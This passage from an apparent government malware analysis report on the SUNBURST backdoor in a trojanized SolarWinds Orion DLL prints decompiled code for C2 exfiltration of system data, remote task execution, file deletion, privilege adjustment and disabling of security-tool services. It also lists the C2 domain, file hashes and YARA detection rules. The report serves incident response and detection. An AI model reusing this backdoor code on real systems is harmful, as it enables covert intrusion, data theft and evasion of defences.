OrionImprovementBusinessLayer.GetManagementObjectProperty(managementObject, OrionImprovementBusinessLayer.ZipHelper.Unzip(DNSHostName)); str += OrionImprovementBusinessLayer.GetManagementObjectProperty(managementObject, OrionImprovementBusinessLayer.ZipHelper.Unzip(DNSDomainSuffixSearchOrder)); str += OrionImprovementBusinessLayer.GetManagementObjectProperty(managementObject, OrionImprovementBusinessLayer.ZipHelper.Unzip(DNSServerSearchOrder)); str += OrionImprovementBusinessLayer.GetManagementObjectProperty(managementObject, OrionImprovementBusinessLayer.ZipHelper.Unzip(IPAddress)); str += OrionImprovementBusinessLayer.GetManagementObjectProperty(managementObject, OrionImprovementBusinessLayer.ZipHelper.Unzip(IPSubnet)); str += OrionImprovementBusinessLayer.GetManagementObjectProperty(managementObject, OrionImprovementBusinessLayer.ZipHelper.Unzip(DefaultIPGateway)); } return str; } } catch (Exception ex) { return str + ex.Message; } **UPLOAD SYSTEM INFORMATION** The ?UploadSystemDescription? function is used to exfiltrate gathered system information. It parses through HTTP session information to form a full HTTP request that is sent to the remote C2 server. The modified version of the FNV-1a hash algorithm is utilized to hash certain words associated with outbound HTTP requests, such as ?accept? (Hash: 2734787258623754862) and ?content-type? (Hash: 6116246686670134098). It then parses through the provided HTTP session data using these hash values, rather than HTTP strings, to obfuscate the functionality of this code. This obfuscation makes it more difficult to manually or heuristically identify the functions intent to generate an outbound HTTP session. --Begin UploadSystemDescription Function-- public static void UploadSystemDescription(string[] args, out string result, IWebProxy proxy) ??? { ??? ???result = (string) null; ??? ???string requestUriString = args[0]; ??? ???string s1 = args[1]; ??? ???string s2 = args.Length >= 3 ? args[2] : (string) null; ??? ???string[] strArray = Encoding.UTF8.GetString(Convert.FromBase64String(s1)).Split(new string[3] ??? ???{ ??? ??? "\r\n", ??? ??? "\r", ??? ??? "\n" ??? ???}, StringSplitOptions.None); ??? ???HttpWebRequest httpWebRequest1 = (HttpWebRequest) WebRequest.Create(requestUriString); ??? ???HttpWebRequest httpWebRequest2 = httpWebRequest1; ???httpWebRequest2.set_ServerCertificateValidationCallback(httpWebRequest2.get_ServerCertificateValidationCallback() + (RemoteCertificateValidationCallback) ((sender, cert, chain, sslPolicyErrors) => true)); ??? ???httpWebRequest1.Proxy = proxy; ??? ???httpWebRequest1.Timeout = 120000; ??? ???httpWebRequest1.Method = strArray[0].Split(' ')[0]; ??? ???foreach (string header in strArray) ??? ???{ ??? ??? int length = header.IndexOf(':'); ??? ??? if (length > 0) ??? ??? { ??? ??? ???string headerName = header.Substring(0, length); ??? ??? ???string s3 = header.Substring(length + 1).TrimStart((char[]) Array.Empty<char>()); ??? ??? ???if (!WebHeaderCollection.IsRestricted(headerName)) ??? ??? ???{ httpWebRequest1.Headers.Add(header); ??? ??? ???} ??? ??? ???else ??? ??? ???{ ??? ??? ??? switch (OrionImprovementBusinessLayer.GetHash(headerName.ToLower())) ??? ??? ??? { ??? ??? ??? ???case 2734787258623754862: ??? ??? ??? ??? httpWebRequest1.Accept = s3; ??? ??? ??? ??? continue; ??? ??? ??? ???case 6116246686670134098: httpWebRequest1.ContentType = s3; ??? ??? ??? ??? continue; ??? ??? ??? ???case 7574774749059321801: ??? ??? ??? ??? httpWebRequest1.UserAgent = s3; ??? ??? ??? ??? continue; ??? ??? ??? ???case 8873858923435176895: ??? ??? ??? ??? if (OrionImprovementBusinessLayer.GetHash(s3.ToLower()) == 1475579823244607677UL) ??? ??? ??? ??? { ???httpWebRequest1.ServicePoint.Expect100Continue = true; ??? ??? ??? ??? ???continue; ??? ??? ??? ??? } ??? ??? ??? ??? httpWebRequest1.Expect = s3; ??? ??? ??? ??? continue; ??? ??? ??? ???case 9007106680104765185: ??? ??? ??? ??? httpWebRequest1.Referer = s3; ??? ??? ??? ??? continue; ??? ??? ??? ???case 11266044540366291518: ??? ??? ??? ??? ulong hash = OrionImprovementBusinessLayer.GetHash(s3.ToLower()); ??? ??? ??? ??? httpWebRequest1.KeepAlive = hash == 13852439084267373191UL || httpWebRequest1.KeepAlive; ??? ??? ??? ??? httpWebRequest1.KeepAlive = hash != 14226582801651130532UL && httpWebRequest1.KeepAlive; ??? ??? ??? ??? continue; ??? ??? ??? ???case 15514036435533858158: httpWebRequest1.set_Date(DateTime.Parse(s3)); ??? ??? ??? ??? continue; ??? ??? ??? ???case 16066522799090129502: httpWebRequest1.set_Date(DateTime.Parse(s3)); ??? ??? ??? ??? continue; ??? ??? ??? ???default: ??? ??? ??? ??? continue; ??? ??? ??? } --End UploadSystemDescription Function-- SUNBURST contains functions that give it the ability to run specified tasks, terminate processes, delete files, compute file hashes, and reboot the victim system. **RUN SPECIFIED TASKS** The "ExecuteEngine" is a core function that uses the ?job? variable to carry out certain tasks for the adversary. This function has the ability to run tasks that could consist of command line arguments, alter the registry (to maintain persistence, etc.), collect a detailed description of the target platform, kill tasks, delete files, add files, or even execute a secondary payload: --Begin ExecuteEngine Function-- private int ExecuteEngine( ???OrionImprovementBusinessLayer.HttpHelper.JobEngine job, ??? ???string cl, ??? ???out string result) ??? { ??? ???result = (string) null; ??? ???int num = 0; ??? ???string[] args = OrionImprovementBusinessLayer.Job.SplitString(cl); ??? ???try ??? ???{ ??? ??? if (job == OrionImprovementBusinessLayer.HttpHelper.JobEngine.ReadRegistryValue || job == OrionImprovementBusinessLayer.HttpHelper.JobEngine.SetRegistryValue || (job == OrionImprovementBusinessLayer.HttpHelper.JobEngine.DeleteRegistryValue || job == OrionImprovementBusinessLayer.HttpHelper.JobEngine.GetRegistrySubKeyAndValueNames)) ??? ??? ???num = OrionImprovementBusinessLayer.HttpHelper.AddRegistryExecutionEngine(job, args, out result); ??? ??? switch (job) ??? ??? { ??? ??? ???case OrionImprovementBusinessLayer.HttpHelper.JobEngine.SetTime: ??? ??? ??? int delay; OrionImprovementBusinessLayer.Job.SetTime(args, out delay); ??? ??? ??? this.delay = delay; ??? ??? ??? break; ??? ??? ???case OrionImprovementBusinessLayer.HttpHelper.JobEngine.CollectSystemDescription: OrionImprovementBusinessLayer.Job.CollectSystemDescription(this.proxy.ToString(), out result); ??? ??? ??? break; ??? ??? ???case OrionImprovementBusinessLayer.HttpHelper.JobEngine.UploadSystemDescription: OrionImprovementBusinessLayer.Job.UploadSystemDescription(args, out result, this.proxy.GetWebProxy()); ??? ??? ??? break; ??? ??? ???case OrionImprovementBusinessLayer.HttpHelper.JobEngine.RunTask: ??? ??? ??? num = OrionImprovementBusinessLayer.Job.RunTask(args, cl, out result); ??? ??? ??? break; ??? ??? ???case OrionImprovementBusinessLayer.HttpHelper.JobEngine.GetProcessByDescription: OrionImprovementBusinessLayer.Job.GetProcessByDescription(args, out result); ??? ??? ??? break; ??? ??? ???case OrionImprovementBusinessLayer.HttpHelper.JobEngine.KillTask: OrionImprovementBusinessLayer.Job.KillTask(args); ??? ??? ??? break; ??? ??? } ??? ??? return job == OrionImprovementBusinessLayer.HttpHelper.JobEngine.WriteFile || job == OrionImprovementBusinessLayer.HttpHelper.JobEngine.FileExists || (job == OrionImprovementBusinessLayer.HttpHelper.JobEngine.DeleteFile || job == OrionImprovementBusinessLayer.HttpHelper.JobEngine.GetFileHash) || job == OrionImprovementBusinessLayer.HttpHelper.JobEngine.GetFileSystemEntries ? OrionImprovementBusinessLayer.HttpHelper.AddFileExecutionEngine(job, args, out result) : num; ??? ???} ??? ???catch (Exception ex) ??? ???{ ??? ??? if (!string.IsNullOrEmpty(result)) ??? ??? ???result += "\n"; ??? ??? result += ex.Message; ??? ??? return ex.HResult; ??? ???} --End ExecuteEngine function-- **TERMINATE PROCESSES** ??? public static void KillTask(string[] args) => Process.GetProcessById(int.Parse(args[0])).Kill(); **DELETE FILE** ??? public static void DeleteFile(string[] args) => System.IO.File.Delete(Environment.ExpandEnvironmentVariables(args[0])); **COMPUTE FILE HASHES** ??? public static int GetFileHash(string[] args, out string result) ??? { ??? ???result = (string) null; ??? ???string path = Environment.ExpandEnvironmentVariables(args[0]); ??? ???using (MD5 md5 = MD5.Create()) ??? ???{ ??? ??? using (FileStream fileStream = System.IO.File.OpenRead(path)) ??? ??? { ??? ??? ???byte[] hash = md5.ComputeHash((Stream) fileStream); ??? ??? ???if (args.Length > 1) ??? ??? ??? return !(OrionImprovementBusinessLayer.ByteArrayToHexString(hash).ToLower() == args[1].ToLower()) ? 1 : 0; ??? ??? ???result = OrionImprovementBusinessLayer.ByteArrayToHexString(hash); ??? ??? } ??? ???} ??? ???return 0; ??? } **REBOOT SYSTEM** public static bool RebootComputer() ??? { ??? ???bool flag = false; ??? ???try ??? ???{ ??? ??? bool previousState = false; ??? ??? string privilege = OrionImprovementBusinessLayer.ZipHelper.Unzip(ph2eifo3n5utg1j8d94qrvbmk0sal76c); ??? ??? if (!OrionImprovementBusinessLayer.NativeMethods.SetProcessPrivilege(privilege, true, out previousState)) ??? ??? ???return flag; ??? ??? flag = OrionImprovementBusinessLayer.NativeMethods.InitiateSystemShutdownEx((string) null, (string) null, 0U, true, true, 2147745794U); OrionImprovementBusinessLayer.NativeMethods.SetProcessPrivilege(privilege, previousState, out previousState); ??? ??? return flag; ??? ???} ??? ???catch (Exception ex) ??? ???{ ??? ??? return flag; ??? ???} ??? } --End additional functions Function-- **ADJUST PROCESS PRIVILEGES** The SetProcessPrivilege function is used to adjust privileges for a target process on the victim system. For example, a process may need increased system level privileges to accomplish its designed task. --Begin SetProcessPrivilege Function-- public static bool SetProcessPrivilege( ??? ???string privilege, ??? ???bool newState, ??? ???out bool previousState) ??? { ??? ???bool flag = false; ??? ???previousState = false; ??? ???try ??? ???{ ??? ??? IntPtr zero = IntPtr.Zero; OrionImprovementBusinessLayer.NativeMethods.LUID Luid = new OrionImprovementBusinessLayer.NativeMethods.LUID(); ??? ??? Luid.LowPart = 0U; ??? ??? Luid.HighPart = 0U; ??? ??? if (!OrionImprovementBusinessLayer.NativeMethods.OpenProcessToken(OrionImprovementBusinessLayer.NativeMethods.GetCurrentProcess(), TokenAccessLevels.Query | TokenAccessLevels.AdjustPrivileges, ref zero)) ??? ??? ???return false; ??? ??? if (!OrionImprovementBusinessLayer.NativeMethods.LookupPrivilegeValue((string) null, privilege, ref Luid)) ??? ??? { ???OrionImprovementBusinessLayer.NativeMethods.CloseHandle(zero); ??? ??? ???return false; ??? ??? } OrionImprovementBusinessLayer.NativeMethods.TOKEN_PRIVILEGE NewState = new OrionImprovementBusinessLayer.NativeMethods.TOKEN_PRIVILEGE(); OrionImprovementBusinessLayer.NativeMethods.TOKEN_PRIVILEGE PreviousState = new OrionImprovementBusinessLayer.NativeMethods.TOKEN_PRIVILEGE(); ??? ??? NewState.PrivilegeCount = 1U; ??? ??? NewState.Privilege.Luid = Luid; ??? ??? NewState.Privilege.Attributes = newState ? 2U : 0U; ??? ??? uint ReturnLength = 0; OrionImprovementBusinessLayer.NativeMethods.AdjustTokenPrivileges(zero, false, ref NewState, (uint) Marshal.SizeOf((object) PreviousState), ref PreviousState, ref ReturnLength); ??? ??? previousState = (PreviousState.Privilege.Attributes & 2U) > 0U; ??? ??? flag = true; OrionImprovementBusinessLayer.NativeMethods.CloseHandle(zero); ??? ??? return flag; ??? ???} ??? ???catch (Exception ex) ??? ???{ ??? ??? return flag; ??? ???} ??? } ??? [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)] ??? private struct LUID ??? { ??? ???public uint LowPart; ??? ???public uint HighPart; ??? } ??? [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)] ??? private struct LUID_AND_ATTRIBUTES ??? { ??? ???public OrionImprovementBusinessLayer.NativeMethods.LUID Luid; ??? ???public uint Attributes; ??? } ??? [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)] ??? private struct TOKEN_PRIVILEGE ??? { ??? ???public uint PrivilegeCount; ??? ???public OrionImprovementBusinessLayer.NativeMethods.LUID_AND_ATTRIBUTES Privilege; ??? } ???} --End SetProcessPrivilege Function-- **BLOCK LIST CHECKING FUNCTIONS** The Update function is critical to starting the SUNBURST C2 functionality. Early in its execution, the Update function calls the UpdateNotification() function. If that returns a ?False?, indicating one of the hard-coded block list processes is running, the SUNBURST malware will not initiate its C2 session. The malicious class ?OrionImprovementBusinessLayer?, containing the SUNBURST module, will effectively be disabled. However, the parent SolarWinds process running the malicious DLL 32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77 will not be interrupted. --Begin Update Function-- ???private static void Update() ???{ ??? bool flag1 = false; OrionImprovementBusinessLayer.CryptoHelper cryptoHelper = new OrionImprovementBusinessLayer.CryptoHelper(OrionImprovementBusinessLayer.userId, OrionImprovementBusinessLayer.domain4); OrionImprovementBusinessLayer.HttpHelper http = (OrionImprovementBusinessLayer.HttpHelper) null; ??? Thread thread = (Thread) null; ??? bool last = true; OrionImprovementBusinessLayer.AddressFamilyEx addressFamilyEx = OrionImprovementBusinessLayer.AddressFamilyEx.Unknown; ??? int num1 = 0; ??? bool flag2 = true; OrionImprovementBusinessLayer.DnsRecords rec = new OrionImprovementBusinessLayer.DnsRecords(); ??? Random random = new Random(); ??? int num2 = 0; ??? if (!OrionImprovementBusinessLayer.UpdateNotification()) ??? ???return; OrionImprovementBusinessLayer.svcListModified2 = false; ??? for (int index = 1; index <= 3 && !flag1; ++index) ??? { ???OrionImprovementBusinessLayer.DelayMin(rec.A, rec.A); ??? ???if (!OrionImprovementBusinessLayer.ProcessTracker.TrackProcesses(true)) ??? ???{ ??? ??? if (OrionImprovementBusinessLayer.svcListModified1) ??? ??? ???flag2 = true; ??? ??? num1 = OrionImprovementBusinessLayer.svcListModified2 ? num1 + 1 : 0; ??? ??? string hostName; ??? ??? switch (OrionImprovementBusinessLayer.status) ??? ??? { ??? ??? ???case OrionImprovementBusinessLayer.ReportStatus.New: ??? ??? ??? hostName = addressFamilyEx == OrionImprovementBusinessLayer.AddressFamilyEx.Error ? cryptoHelper.GetCurrentString() : cryptoHelper.GetPreviousString(out last); ??? ??? ??? break; ??? ??? ???case OrionImprovementBusinessLayer.ReportStatus.Append: ??? ??? ??? hostName = flag2 ? cryptoHelper.GetNextStringEx(rec.dnssec) : cryptoHelper.GetNextString(rec.dnssec); ??? ??? ??? break; ??? ??? ???default: ??? ??? ??? goto label_27; ??? ??? } --End Update Function-- The UpdateNotification() function will return a "False" if any process on the hard coded blocklist is running on the target system. It utilizes the TrackProcess function detailed below. It call the TrackProcesses function. --Begin UpdateNotification Function-- private static bool UpdateNotification() ???{ ??? int num = 3; ??? while (num-- > 0) ??? { ???OrionImprovementBusinessLayer.DelayMin(0, 0); ??? ???if (OrionImprovementBusinessLayer.ProcessTracker.TrackProcesses(true)) ??? ??? return false; ??? ???if (OrionImprovementBusinessLayer.DnsHelper.CheckServerConnection(OrionImprovementBusinessLayer.apiHost)) ??? ??? return true; ??? } ??? return false; ???} --End UpdateNotification Function-- The "TrackProcesses" function queries a list of running processes on the target system and then passes the process names to the "SearchAssemblies" function, which hashes their process names and compares the result hashes to the hard-coded process hash list stored in the list "assemblyTimeStamps." If any of the target processes are running, the function will return True. It also searches for certain services and attempts to disable them. --Begin TrackProcesses Function-- public static bool TrackProcesses(bool full) ??? { ??? ???Process[] processes = Process.GetProcesses(); ??? ???if (OrionImprovementBusinessLayer.ProcessTracker.SearchAssemblies(processes)) ??? ??? return true; ??? ???bool flag = OrionImprovementBusinessLayer.ProcessTracker.SearchServices(processes); ??? ???return !flag & full ? OrionImprovementBusinessLayer.ProcessTracker.SearchConfigurations() : flag; ??? } --End TrackProcesses Function-- The "SearchAssemblies" function called by TrackProcesses, is used to enumerate running processes to determine if any of the hashed processes, included within the process blocklist are currently running on the target system. --Begin SearchAssemblies Function? private static bool SearchAssemblies(Process[] processes) ??? { ??? ???for (int index = 0; index < processes.Length; ++index) ??? ???{ ??? ??? ulong hash = OrionImprovementBusinessLayer.GetHash(processes[index].ProcessName.ToLower()); ??? ??? if (Array.IndexOf<ulong>(OrionImprovementBusinessLayer.assemblyTimeStamps, hash) != -1) ??? ??? ???return true; ??? ???} ??? ???return false; ??? } --End SearchAssemblies Function-- The SearchServices" function, called by TrackProcesses, searches running services to determine whether or not they are running any of the hard-coded block list target process hashes. It attempts to disable these services. --Begin SearchServices Function-- private static bool SearchServices(Process[] processes) ??? { ??? ???for (int index = 0; index < processes.Length; ++index) ??? ???{ ??? ??? ulong hash = OrionImprovementBusinessLayer.GetHash(processes[index].ProcessName.ToLower()); ??? ??? foreach (OrionImprovementBusinessLayer.ServiceConfiguration svc in OrionImprovementBusinessLayer.svcList) ??? ??? { ??? ??? ???if (Array.IndexOf<ulong>(svc.timeStamps, hash) != -1) ??? ??? ???{ ??? ??? ??? object obj = OrionImprovementBusinessLayer.ProcessTracker._lock; ??? ??? ??? bool flag = false; ??? ??? ??? try ??? ??? ??? { ??? ??? ??? ???Monitor.Enter(obj, ref flag); ??? ??? ??? ???if (!svc.running) ??? ??? ??? ???{ OrionImprovementBusinessLayer.svcListModified1 = true; OrionImprovementBusinessLayer.svcListModified2 = true; ??? ??? ??? ??? svc.running = true; ??? ??? ??? ???} ??? ??? ??? ???if (!svc.disabled) ??? ??? ??? ???{ ??? ??? ??? ??? if (!svc.stopped) ??? ??? ??? ??? { ??? ??? ??? ??? ???if (svc.Svc.Length != 0) ??? ??? ??? ??? ???{ OrionImprovementBusinessLayer.DelayMin(0, 0); OrionImprovementBusinessLayer.ProcessTracker.SetManualMode(svc.Svc); ??? ??? ??? ??? ??? svc.disabled = true; ??? ??? ??? ??? ??? svc.stopped = true; ??? ??? ??? ??? ???} ??? ??? ??? ??? } ??? ??? ??? ???} ??? ??? ??? } ??? ??? ??? finally ??? ??? ??? { ??? ??? ??? ???if (flag) ??? ??? ??? ??? Monitor.Exit(obj); ??? ??? ??? } --End SearchServices Function-- Screenshots Figure 1 - The modified module with a new class function named "OrionImprovementBusinessLayer." *Figure 1 - *The modified module with a new class function named "OrionImprovementBusinessLayer." Figure 2 - The code snippet contains the subdomains and other strings used to construct the C2 domains. *Figure 2 - *The code snippet contains the subdomains and other strings used to construct the C2 domains. avsvmcloud.com Tags command-and-control Whois Domain Name: avsvmcloud.com Registry Domain ID: 2289718834_DOMAIN_COM-VRSN Registrar WHOIS Server: whois.godaddy.com Registrar URL: http://www.godaddy.com Updated Date: 2020-10-08T13:58:35Z Creation Date: 2018-07-25T11:38:29Z Registrar Registration Expiration Date: 2023-07-25T11:38:29Z Registrar: GoDaddy.com, LLC Registrar IANA ID: 146 Registrar Abuse Contact Email: abuse at godaddy.com Registrar Abuse Contact Phone: +1.4806242505 Domain Status: clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited Domain Status: clientUpdateProhibited http://www.icann.org/epp#clientUpdateProhibited Domain Status: clientRenewProhibited http://www.icann.org/epp#clientRenewProhibited Domain Status: clientDeleteProhibited http://www.icann.org/epp#clientDeleteProhibited Registry Registrant ID: Not Available >From Registry Registrant Name: Registration Private Registrant Organization: Domains By Proxy, LLC Registrant Street: DomainsByProxy.com Registrant Street: 14455 N. Hayden Road Registrant City: Scottsdale Registrant State/Province: Arizona Registrant Postal Code: 85260 Registrant Country: US Registrant Phone: +1.4806242599 Registrant Phone Ext: Registrant Fax: +1.4806242598 Registrant Fax Ext: Registrant Email: avsvmcloud.com at domainsbyproxy.com Registry Admin ID: Not Available From Registry Admin Name: Registration Private Admin Organization: Domains By Proxy, LLC Admin Street: DomainsByProxy.com Admin Street: 14455 N. Hayden Road Admin City: Scottsdale Admin State/Province: Arizona Admin Postal Code: 85260 Admin Country: US Admin Phone: +1.4806242599 Admin Phone Ext: Admin Fax: +1.4806242598 Admin Fax Ext: Admin Email: avsvmcloud.com at domainsbyproxy.com Registry Tech ID: Not Available From Registry Tech Name: Registration Private Tech Organization: Domains By Proxy, LLC Tech Street: DomainsByProxy.com Tech Street: 14455 N. Hayden Road Tech City: Scottsdale Tech State/Province: Arizona Tech Postal Code: 85260 Tech Country: US Tech Phone: +1.4806242599 Tech Phone Ext: Tech Fax: +1.4806242598 Tech Fax Ext: Tech Email: avsvmcloud.com at domainsbyproxy.com Name Server: PDNS09.DOMAINCONTROL.COM Name Server: PDNS10.DOMAINCONTROL.COM DNSSEC: unsigned URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/ >>> Last update of WHOIS database: 2020-12-14T19:00:00Z <<< Relationships avsvmcloud.com Connected_From 32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77 Description The subdomain for "SolarWinds.Orion.Core.BusinessLayer.dll." d0d626deb3f9484e649294a8dfa814c5568f846d5aa02d4cdad5d041a29d5600 Tags dropper Details Name SolarWinds-Core-v2019.4.5220-Hotfix5.msp Size 214831104 bytes Type Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Title: Installation Database, Subject: SolarWinds Orion Core Services 2019.4, Author: SolarWinds Worldwide, LLC., Keywords: Installer, Comments: This installer database contains the logic and data required to install SolarWinds Orion Core Services 2019.4., Create Time/Date: Tue Mar 24 11:55:04 2020, Name of Creating Application: Windows Installer XML Toolset (3.9.1208.0), Security: 4, Template: Intel;1033, Last Saved By: Intel;1033, Revision Number: {079A74C5-95D0-446E-86F7-B8EAF0A29654}119.4.20161.5220;{079A74C5-95D0-446E-86F7-B8EAF0A29654}119.4.20161.5220;{DA36F8E2-99FC-44DF-B011-09F6B063B0F7}, Number of Pages: 200, Number of Characters: 152174623 MD5 02af7cec58b9a5da1c542b5a32151ba1 SHA1 1b476f58ca366b54f34d714ffce3fd73cc30db1a SHA256 d0d626deb3f9484e649294a8dfa814c5568f846d5aa02d4cdad5d041a29d5600 SHA512 f40fd5d94791f18eed59dc78d12acc52f4a65dfdf8c819d6957de8059e0e127160e0a21320845340932a54f9c639c42b2c815558b2d0cec111e06aa5c8908ea4 ssdeep 3145728:yMbnCpAK7nuv7xYiq0bC4zheqeRHuCieBVZNP7WJOQeXt+9riYBaeIBjSxTusL:yMbCp7uf3GnqfCVrNPgLrW4GoxSG Entropy 7.998885 Antivirus No matches found. YARA Rules No matches found. ssdeep Matches No matches found. Relationships d0d626deb3... Contains 32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77 Description This file is a Microsoft Windows Installer Patch file that has been identified as a SUNBURST installer named "SolarWinds-Core-v2019.4.5220-Hotfix5.msp." This file contains legitimate SolarWinds Orion update components, the modified DLL "SolarWinds.Orion.Core.BusinessLayer.dll" (32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77) and a legitimate configuration file. The hotfix is typically delivered to the SolarWinds Orion application as an update for the "SolarWinds.Orion.Core.BusinessLayer.dll" module. In this case, when the update is applied, it will overwrite the non-malicious module, replacing it with the trojanized version and providing the attacker with the same level of access as described in the analysis of "32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77." ce77d116a074dab7a22a0fd4f2c1ab475f16eec42e1ded3c0b0aa8211fe858d6 Tags backdoortrojan Details Name SolarWinds.Orion.Core.BusinessLayer.dll Size 1028072 bytes Type PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows MD5 846e27a652a5e1bfbd0ddd38a16dc865 SHA1 d130bd75645c2433f88ac03e73395fba172ef676 SHA256 ce77d116a074dab7a22a0fd4f2c1ab475f16eec42e1ded3c0b0aa8211fe858d6 SHA512 c26e275b4232be844f6c4062a4f42413099452085060ed4080b880b52800428cd32f69271c98977fa979a89355fbb3b485855ca3d51499bca12dfbf8c3168d2f ssdeep 12288:5JKoHwfn/jz3bbO4Qag2I97PMieSLezPKT+BYvjenWHuhh9c0g8vkzK19Q:vEfDbO97P8TrK0YbenWH4c0g8vkzK19 Entropy 5.580054 Antivirus Ahnlab Backdoor/Win32.SunBurst Antiy Trojan[Backdoor]/MSIL.Agent Avira TR/Sunburst.A BitDefender Trojan.Sunburst.A Clamav Win.Countermeasure.Sunburst-9809152-0 Comodo Backdoor Cyren W32/MSIL_SunBurst.A.gen!Eldorado ESET a variant of MSIL/SunBurst.A trojan Emsisoft Trojan.Win32.Sunburst (A) Ikarus Backdoor.Sunburst K7 Trojan ( 00574a531 ) Lavasoft Trojan.Sunburst.A McAfee Trojan-sunburst Microsoft Security Essentials Trojan:MSIL/Solorigate.BR!dha NANOAV Trojan.Win32.SunBurst.iduxyv Sophos Mal/Sunburst-A Symantec Backdoor.Sunburst Systweak trojan-backdoor.sunburst-r TrendMicro Backdoo.6F8C6A1E TrendMicro House Call Backdoo.6F8C6A1E VirusBlokAda TScope.Trojan.MSIL Zillya! Trojan.SunBurst.Win32.1 YARA Rules * rule CISA_10318927_01 : trojan rat SOLAR_FIRE { ???meta: ??? ???Author = "CISA Code & Media Analysis" ??? ???Incident = "10318927" ??? ???Date = "2020-12-13" ??? ???Last_Modified = "20201213_2145" ??? ???Actor = "n/a" ??? ???Category = "TROJAN RAT" ??? ???Family = "SOLAR_FIRE" ??? ???Description = "This signature is based off of unique strings embedded within the modified Solar Winds app" ??? ???MD5_1 = "b91ce2fa41029f6955bff20079468448" ??? ???SHA256_1 = "32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77" ??? ???MD5_2 = "846e27a652a5e1bfbd0ddd38a16dc865" ??? ???SHA256_2 = "ce77d116a074dab7a22a0fd4f2c1ab475f16eec42e1ded3c0b0aa8211fe858d6" ???strings: ??? ???$s0 = { 63 00 30 00 6B 00 74 00 54 00 69 00 37 00 4B 00 4C 00 43 00 6A 00 4A 00 7A 00 4D 00 38 00 44 } ??? ???$s1 = { 41 00 41 00 3D 00 3D 00 00 21 38 00 33 00 56 00 30 00 64 00 6B 00 78 00 4A 00 4B 00 55 } ??? ???$s2 = { 63 00 2F 00 46 00 77 00 44 00 6E 00 44 00 4E 00 53 00 30 00 7A 00 4B 00 53 00 55 00 30 00 42 00 41 00 41 00 3D 00 3D } ??? ???$s3 = { 53 00 69 00 30 00 75 00 42 00 67 00 41 00 3D 00 00 21 38 00 77 00 77 00 49 00 4C 00 6B 00 33 00 4B 00 53 00 79 00 30 00 42 } ???condition: all of them } * rule FireEye_20_00025668_01 : SUNBURST APT backdoor { ???meta: ??? ???Author = "FireEye" ??? ???Date = "2020-12-13" ??? ???Last_Modified = "20201213_1917" ??? ???Actor = "n/a" ??? ???Category = "Backdoor" ??? ???Family = "SUNBURST" ??? ???Description = "This rule is looking for portions of the SUNBURST backdoor that are vital to how it functions. The first signature fnv_xor matches a magic byte xor that the sample performs on process, service, and driver names/paths. SUNBURST is a backdoor that has the ability to spawn and kill processes, write and delete files, set and create registry keys, gather system information, and disable a set of forensic analysis tools and services." ??? ???MD5_1 = "" ??? ???SHA256_1 = "" ???strings: ??? ???$cmd_regex_encoded = "U4qpjjbQtUzUTdONrTY2q42pVapRgooABYxQuIZmtUoA" wide ??? ???$cmd_regex_plain = { 5C 7B 5B 30 2D 39 61 2D 66 2D 5D 7B 33 36 7D 5C 7D 22 7C 22 5B 30 2D 39 61 2D 66 5D 7B 33 32 7D 22 7C 22 5B 30 2D 39 61 2D 66 5D 7B 31 36 7D } ??? ???$fake_orion_event_encoded = "U3ItS80rCaksSFWyUvIvyszPU9IBAA==" wide ??? ???$fake_orion_event_plain = { 22 45 76 65 6E 74 54 79 70 65 22 3A 22 4F 72 69 6F 6E 22 2C } ??? ???$fake_orion_eventmanager_encoded = "U3ItS80r8UvMTVWyUgKzfRPzEtNTi5R0AA==" wide ??? ???$fake_orion_eventmanager_plain = { 22 45 76 65 6E 74 4E 61 6D 65 22 3A 22 45 76 65 6E 74 4D 61 6E 61 67 65 72 22 2C } ??? ???$fake_orion_message_encoded = "U/JNLS5OTE9VslKqNqhVAgA=" wide ??? ???$fake_orion_message_plain = { 22 4D 65 73 73 61 67 65 22 3A 22 7B 30 7D 22 } ??? ???$fnv_xor = { 67 19 D8 A7 3B 90 AC 5B } ???condition: ??? ???$fnv_xor and ($cmd_regex_encoded or $cmd_regex_plain) or ( ($fake_orion_event_encoded or $fake_orion_event_plain) and ($fake_orion_eventmanager_encoded or $fake_orion_eventmanager_plain) and ($fake_orion_message_encoded and $fake_orion_message_plain) ) } * rule FireEye_20_00025668_02 : SUNBURST APT backdoor { ???meta: ??? ???Author = "FireEye" ??? ???Date = "2020-12-13" ??? ???Last_Modified = "20201213_1917" ??? ???Actor = "n/a" ??? ???Category = "Backdoor" ??? ???Family = "SUNBURST" ??? ???Description = "The SUNBURST backdoor uses a domain generation algorithm (DGA) as part of C2 communications. This rule is looking for each branch of the code that checks for which HTTP method is being used. This is in one large conjunction, and all branches are then tied together via disjunction. The grouping is intentionally designed so that if any part of the DGA is re-used in another sample, this signature should match that re-used portion. SUNBURST is a backdoor that has the ability to spawn and kill processes, write and delete files, set and create registry keys, gather system information, and disable a set of forensic analysis tools and services." ??? ???MD5_1 = "" ??? ???SHA256_1 = "" ???strings: ??? ???$a = "0y3Kzy8BAA==" wide ??? ???$aa = "S8vPKynWL89PS9OvNqjVrTYEYqNa3fLUpDSgTLVxrR5IzggA" wide ??? ???$ab = "S8vPKynWL89PS9OvNqjVrTYEYqPaauNaPZCYEQA=" wide ??? ???$ac = "C88sSs1JLS4GAA==" wide ??? ???$ad = "C/UEAA==" wide ??? ???$ae = "C89MSU8tKQYA" wide ??? ???$af = "8wvwBQA=" wide ??? ???$ag = "cyzIz8nJBwA=" wide ??? ???$ah = "c87JL03xzc/LLMkvysxLBwA=" wide ??? ???$ai = "88tPSS0GAA==" wide ??? ???$aj = "C8vPKc1NLQYA" wide ??? ???$ak = "88wrSS1KS0xOLQYA" wide ??? ???$al = "c87PLcjPS80rKQYA" wide ??? ???$am = "Ky7PLNAvLUjRBwA=" wide ??? ???$an = "06vIzQEA" wide ??? ???$b = "0y3NyyxLLSpOzIlPTgQA" wide ??? ???$c = 